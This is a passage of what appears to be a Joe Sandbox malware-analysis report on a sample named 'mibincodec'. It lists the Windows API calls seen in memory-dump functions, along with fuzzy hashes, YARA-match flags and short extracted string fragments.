                                                                  • Opcode Fuzzy Hash: 90c9098b3b1810c4423cb8c37353cda5e5a2631d078fdfc78f2f65b35950e462
                                                                  • Instruction Fuzzy Hash: 9E41A778A40109EFDB05CF54C4A4BEAB7B2FF88314F25C559E8199B355C775EA82CB80
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,021F68DC), ref: 021F70F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: bff7881afb69966ba25f20670d9099a30b6d73bb63cc6d86949ab23f1b18302d
                                                                  • Instruction ID: d85e731e758b84ce13fc5c334d9120926fe23c955e1559c941d0ec5cab316855
                                                                  • Opcode Fuzzy Hash: bff7881afb69966ba25f20670d9099a30b6d73bb63cc6d86949ab23f1b18302d
                                                                  • Instruction Fuzzy Hash: D031B9107C41425BD6E86A6965A033B515B9B82344F2A086EF332CF7C5DF65CD429BD3
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,021F704F,021F68DC), ref: 021F6F40
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 293ba0d8bcd137fe2ddd6faad5df7dd894d6dc9fc8076330fbcb3b2243b4eac9
                                                                  • Instruction ID: 12543f956f49ba5df466434fd48d399b28cda5f2a75a3aaef9f0cfda7fbd2c59
                                                                  • Opcode Fuzzy Hash: 293ba0d8bcd137fe2ddd6faad5df7dd894d6dc9fc8076330fbcb3b2243b4eac9
                                                                  • Instruction Fuzzy Hash: 3C014F35B81241AFD7D4BBB5B86063B22E79BC06947150869F235CB384EB34DC514B91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 427982af8409aa733b288edc5ce16a333f90a22b14db1b118aa18f191a1dec00
                                                                  • Instruction ID: f5b17ef96989d7fe12a11dc186f0162cd2417707a9d812043245ecbaa595aacb
                                                                  • Opcode Fuzzy Hash: 427982af8409aa733b288edc5ce16a333f90a22b14db1b118aa18f191a1dec00
                                                                  • Instruction Fuzzy Hash: 14D09EB4D80208BFD741EFA4E95AB9DBBB4EF04702F108165E91567241E7705A148F52
                                                                  APIs
                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 021B182F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 779319e8929f5e48e26d5cec05c100b061a57d2ea217fbc5ed9228526683356c
                                                                  • Instruction ID: ef8dc75cb3707511fa77580ff18b72113f500bd412893dce756be5eb0b68292d
                                                                  • Opcode Fuzzy Hash: 779319e8929f5e48e26d5cec05c100b061a57d2ea217fbc5ed9228526683356c
                                                                  • Instruction Fuzzy Hash: 2EC04C7A55420CAB8B04DF98E894DAB77FDBB8C610B048548BA1D87200C630F9608BA4
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 021FA0FB
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA0FE
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess
                                                                  • String ID: 79V#$79V#$79V#$>p$>p$p^5w$.#v$Ei
                                                                  • API String ID: 2050909247-1755071274
                                                                  • Opcode ID: 0538f057617ba60ef834776071eb9ffe93e0c09953074584ad9f129310d59281
                                                                  • Instruction ID: 7d07641aecb5a47a26938dd42b4d794c50c82357f0f7aa53a5b441982ac92b98
                                                                  • Opcode Fuzzy Hash: 0538f057617ba60ef834776071eb9ffe93e0c09953074584ad9f129310d59281
                                                                  • Instruction Fuzzy Hash: D7A1EF71B842019FCB94EB68A49062F32E6AFC4644F65096DF779DB340EB38DC418BD2
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 021FA0FB
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA0FE
                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 021FA101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess
                                                                  • String ID: 79V#$79V#$79V#$>p
                                                                  • API String ID: 2050909247-2830606539
                                                                  • Opcode ID: 4b044b2f073d3f47758a4dbc816e0e2806251e9532be6d1b6ba1011879c931c3
                                                                  • Instruction ID: 9474ca584f18cfeb4f8b9876a327a74e0e93161b7b80dc54d36626d59a6917c8
                                                                  • Opcode Fuzzy Hash: 4b044b2f073d3f47758a4dbc816e0e2806251e9532be6d1b6ba1011879c931c3
                                                                  • Instruction Fuzzy Hash: 5231C431F812509BCB90AAA8649472F36D7AFC4784F290959EBB9D7250EF38DC414BD1
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021B14DB
                                                                  • SetLastError.KERNEL32(0000007F), ref: 021B1507
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: dba912d3f4bb9cc6977b4580150c7e52e74ecb9038743cac4a034ba6f30d49a2
                                                                  • Instruction ID: 389f60e86b6d0469a472184474509ceef4dc307803a54fc7ce8e1ce91e87d4f3
                                                                  • Opcode Fuzzy Hash: dba912d3f4bb9cc6977b4580150c7e52e74ecb9038743cac4a034ba6f30d49a2
                                                                  • Instruction Fuzzy Hash: B8711974E40109EFDB09DF94C591BAEB7B2FF48304F258598E51AAB341D774AA81CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346828238.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3346814393.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346843200.00000000021FD000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002200000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002205000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000003.00000002.3346856091.0000000002212000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21f0000_mibincodec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E?*$a7a&$a7a&$Ei$Ei
                                                                  • API String ID: 0-288907479
                                                                  • Opcode ID: c9bd78de32a3ecfbcbcd506ccc85d1ff1d921d12d32957eaa052150ebdddcd1b
                                                                  • Instruction ID: e88e066a070718a50e042272f930097804b0234d5039a056a5639cf8f047964f
                                                                  • Opcode Fuzzy Hash: c9bd78de32a3ecfbcbcd506ccc85d1ff1d921d12d32957eaa052150ebdddcd1b
                                                                  • Instruction Fuzzy Hash: C5E1AE71688241EFC798DF68D490A6FB3E6ABC4344F14491DEABAD7340DB34E905CB92
                                                                  APIs
                                                                  • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 021B21F9
                                                                  • SetLastError.KERNEL32(0000007E), ref: 021B223B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHugeLastRead
                                                                  • String ID:
                                                                  • API String ID: 3239643929-0
                                                                  • Opcode ID: e8d434907652df0c0ec9d9797f59f0ba0157d082feeea6b84f55e5c896ee3053
                                                                  • Instruction ID: beca8318521c637b0d66a530cbaa565604e7c454a404e38b0e126f93f8851088
                                                                  • Opcode Fuzzy Hash: e8d434907652df0c0ec9d9797f59f0ba0157d082feeea6b84f55e5c896ee3053
                                                                  • Instruction Fuzzy Hash: 6381B974A40209EFDB09DF94C894BAEB7B1FF88314F148198E919AB351C734EA95CF91
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 021B2468
                                                                  • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021B24B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3346693570.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_21b1000_mibincodec.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: @
                                                                  • API String ID: 544645111-2766056989
                                                                  • Opcode ID: 79f2469ea0889e90942112e25491720d637a84c84d50eca08ab80dc105bb249d
                                                                  • Instruction ID: 1d1c04aa63e66fcdcde06257e2d11f52d8491e0a8e86fc2926125fc2259944dc
                                                                  • Opcode Fuzzy Hash: 79f2469ea0889e90942112e25491720d637a84c84d50eca08ab80dc105bb249d
                                                                  • Instruction Fuzzy Hash: 132107B0E44208EFDF09CF98C980BEDBBB5BF44304F208589DD15AB640C774AA84DB51